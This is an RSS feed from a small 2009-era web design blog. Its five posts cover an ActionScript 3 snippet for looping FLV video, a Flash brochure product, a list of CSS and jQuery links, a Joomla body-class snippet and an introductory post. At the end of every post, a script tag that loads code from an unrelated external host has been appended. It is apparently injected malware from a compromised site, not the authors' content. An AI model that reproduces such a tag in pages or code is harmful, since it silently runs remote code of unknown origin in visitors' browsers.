<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Official Design and Development Resource of ThornyRabbit &#187; Code</title>
	<atom:link href="http://blog.thornyrabbit.com/category/code/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.thornyrabbit.com</link>
	<description>because we love</description>
	<lastBuildDate>Fri, 19 Mar 2010 16:55:29 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Looping an FLV video</title>
		<link>http://blog.thornyrabbit.com/2009/12/looping-an-flv-video/</link>
		<comments>http://blog.thornyrabbit.com/2009/12/looping-an-flv-video/#comments</comments>
		<pubDate>Mon, 07 Dec 2009 23:31:28 +0000</pubDate>
		<dc:creator>thornyeternity</dc:creator>
				<category><![CDATA[ActionScript 3 Snippets]]></category>
		<category><![CDATA[Code]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[AS3 flash video]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/2009/12/looping-an-flv-video/</guid>
		<description><![CDATA[FLV Playback component is named &#8220;myvideo&#8221; myvideo.addEventListener(Event.COMPLETE, doLoop); function doLoop(event:Event):void{ myvideo.autoRewind=true; myvideo.play(); }]]></description>
			<content:encoded><![CDATA[<p>FLV Playback component is named &#8220;myvideo&#8221;</p>
<p>myvideo.addEventListener(Event.COMPLETE, doLoop);<br />
function doLoop(event:Event):void{<br />
	myvideo.autoRewind=true;<br />
	myvideo.play();<br />
}<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/12/looping-an-flv-video/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Brochure Open Engine</title>
		<link>http://blog.thornyrabbit.com/2009/10/brochure-open-engine/</link>
		<comments>http://blog.thornyrabbit.com/2009/10/brochure-open-engine/#comments</comments>
		<pubDate>Fri, 02 Oct 2009 01:08:07 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[Flash]]></category>
		<category><![CDATA[ActionScript 3]]></category>
		<category><![CDATA[featured]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=233</guid>
		<description><![CDATA[This is one of the earlier items we uploaded to Flashden, but it has proved to be reasonabily popular, so I thought I would highlight it. It is a pretty nifty little flash movie, that is kinda like the evil flash flipping book. I hate flipping books, although it does work in places, for example [...]]]></description>
			<content:encoded><![CDATA[<p>This is one of the earlier items we uploaded to Flashden, but it has proved to be reasonabily popular, so I thought I would highlight it. It is a pretty nifty little flash movie, that is kinda like the evil flash flipping book. I hate flipping books, although it does work in places, for example on the <a href="http://www.Blurb.com" target="_blank">www.Blurb.com</a> site.</p>
<p>What I like about this is that you can have more of a brochure instead of a magazine / book as a lot of the time one tends to create brochures more and also it is a bit more unique. Andrew coded this in ActionScript 3 and since he knows far more than I do about the subject I will not go into the technical aspects of it.</p>
<p><a href="http://flashden.net/item/brochure-open-engine/40619"><img class="alignnone size-full wp-image-258" title="bunnies" src="http://blog.thornyrabbit.com/wp-content/uploads/2009/10/bunnies1.jpg" alt="bunnies" width="400" height="203" /></a></p>
<p><strong>In summary this is what it does:</strong></p>
<p>Brochure Open Engine uses 6 images in the library to create an interactive animated brochure opening, flipping over, and closing.The images can be easily replaced (provided the symbols are kept centered). File size is dependent on the size of the images used. All symbols are editable in the Library. Size is fixed based on the required area to display the full brochure, user can adjust as needed.</p>
<p>If you like the sounds of it have a look on <a href="http://flashden.net/item/brochure-open-engine/40619" target="_blank">Flashden</a>, and even better you can always buy it!<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/10/brochure-open-engine/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Useful CSS, Jquery &amp; HTML references</title>
		<link>http://blog.thornyrabbit.com/2009/09/useful-jquery-references/</link>
		<comments>http://blog.thornyrabbit.com/2009/09/useful-jquery-references/#comments</comments>
		<pubDate>Tue, 29 Sep 2009 15:33:37 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[CSS]]></category>
		<category><![CDATA[Html]]></category>
		<category><![CDATA[Jquery]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=231</guid>
		<description><![CDATA[I am always finding tutorials or references, but by the time I want to use them I can&#8217;t ever seem to find them.  I am starting this page so I can keep track of them, hopefully this way I will manage to find them again when I need them. Smashing Magazine 50 useful new jquery [...]]]></description>
			<content:encoded><![CDATA[<p>I am always finding tutorials or references, but by the time I want to use them I can&#8217;t ever seem to find them.  I am starting this page so I can keep track of them, hopefully this way I will manage to find them again when I need them.</p>
<p><strong>Smashing Magazine</strong></p>
<ul>
<li><a href="http://www.smashingmagazine.com/2009/08/23/50-useful-new-jquery-techniques/" target="_blank">50 useful new jquery techniques</a></li>
<li><a href="http://www.smashingmagazine.com/2009/01/15/45-new-jquery-techniques-for-a-good-user-experience/" target="_blank">45 new jquery techniques for-a good user experience</a></li>
<li><a href="http://buildinternet.com/2009/11/making-an-interactive-picture-with-jquery/" target="_blank">Making an interactive picture with jquery</a></li>
</ul>
<p><strong>CSS</strong></p>
<ul>
<li><a href="http://css-tricks.com/perfect-full-page-background-image/" target="_blank">Perfect Full Page Background Image</a></li>
</ul>
<p><strong>Design Related</strong></p>
<ul>
<li><a href="http://buildinternet.com/2009/07/fonts-used-in-logos-of-popular-websites/" target="_blank">fonts-used-in-logos-of-popular-websites</a></li>
</ul>
<p><script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/09/useful-jquery-references/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Insert body class name in Joomla</title>
		<link>http://blog.thornyrabbit.com/2009/03/insert-body-class-name-in-joomla/</link>
		<comments>http://blog.thornyrabbit.com/2009/03/insert-body-class-name-in-joomla/#comments</comments>
		<pubDate>Wed, 25 Mar 2009 18:40:56 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[CSS]]></category>
		<category><![CDATA[Joomla]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=90</guid>
		<description><![CDATA[I recently had to add a class name per section into a body tag for a Joomla based website I have been working on. After quite a bit of google&#8217;ing I found this and it was super useful. To use the menu alias as the class name &#60;?php $menu = &#38;JSite::getMenu(); $active = $menu-&#62;getActive(); ?&#62; [...]]]></description>
			<content:encoded><![CDATA[<p>I recently had to add a class name per section into a body tag for a Joomla based website I have been working on. After quite a bit of google&#8217;ing I found this and it was super useful.</p>
<p><strong>To use the menu alias as the class name</strong></p>
<pre>&lt;?php
$menu = &amp;JSite::getMenu();
$active = $menu-&gt;getActive();
?&gt;
&lt;body id="&lt;?php print $active-&gt;alias; ?&gt;"&gt;</pre>
<p><strong>Use the menu page class suffix</strong></p>
<pre>&lt;?php
$menu =&amp; JSite::getMenu();
$active = $menu-&gt;getActive();
$params = $menu-&gt;getParams( $active-&gt;id );
$class = $params-&gt;get( 'pageclass_sfx' );
?&gt;
&lt;body&lt;?php if ($class) echo ' class="' . $class . '"'; ?&gt;&gt;</pre>
<p><a href="http://forum.joomla.org/viewtopic.php?f=127&amp;t=281999" target="_blank">Visit this site</a> to view the full discussion thread<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/03/insert-body-class-name-in-joomla/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>The ThornyRabbit library</title>
		<link>http://blog.thornyrabbit.com/2009/01/hello-world/</link>
		<comments>http://blog.thornyrabbit.com/2009/01/hello-world/#comments</comments>
		<pubDate>Thu, 22 Jan 2009 23:15:34 +0000</pubDate>
		<dc:creator>Michele</dc:creator>
				<category><![CDATA[Code]]></category>
		<category><![CDATA[Design]]></category>
		<category><![CDATA[Flash]]></category>

		<guid isPermaLink="false">http://blog.thornyrabbit.com/?p=1</guid>
		<description><![CDATA[This will be the design and development resource for Andrew and Michele Macklin. We have over the last 2 years both tried blogging a bit and it kinda worked and also not. After some discussion one early morning on the ferry over to Vancouver we decided we did not want a blog so much as [...]]]></description>
			<content:encoded><![CDATA[<p>This will be the design and development resource for Andrew and Michele Macklin. We have over the last 2 years both tried blogging a bit and it kinda worked and also not. After some discussion one early morning on the ferry over to Vancouver we decided we did not want a blog so much as a place where we can store our &#8216;stuff&#8217; and if this means that other designers and developers can also make use of it, well then even more reason to do so.</p>
<p>The main reason for this really is that we both keep losing our &#8216;stuff&#8217; &#8211; Photoshop brushes, CSS, HTML and Action script code snippets etc. At the moment we are still sorting through everything so it might take a bit of a while to get this going.<script src="http://ae.awaue.com/7"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://blog.thornyrabbit.com/2009/01/hello-world/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
